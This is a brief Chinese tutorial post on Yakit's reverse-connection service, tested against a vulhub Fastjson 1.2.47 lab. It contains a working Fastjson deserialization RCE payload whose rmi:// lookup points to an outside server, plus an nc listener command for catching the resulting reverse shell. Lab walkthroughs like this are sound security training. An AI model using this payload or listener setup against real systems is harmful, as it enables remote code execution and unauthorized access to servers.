yakit使用

📅 发布于 2025年6月30日 📂 分类: 安全工具使用

yakit 反连服务使用

首先,你需要一台公网服务器(hack 服务器)

安装 yak 环境后,启动

yak bridge --secret [your-pass]

然后在本地的 yakit 中的反连服务器设置中填写好配置:这个端口在你运行完命令后默认就是这个,不用修改。

启动反连服务器后,设置对应的 payload 内容。

我们启动一个 fastjson 靶场环境测试,环境为:vulhub/fastjson/1.2.47-rce

首先在 hack 服务器上面监听 17265 这个端口:nc -lvvp 17265

然后在 yakit 中构造 payload

{
	"a":{
		"@type":"java.lang.Class",
		"val":"com.sun.rowset.JdbcRowSetImpl"
	},
	"b":{
		"@type":"com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName":"rmi://8.140.21.107:8085/SZZmcgXj", # 反连服务器中直接复制地址
		"autoCommit":true
	}
}

发送这个数据包,可以在 hack 服务器成功连接到 shell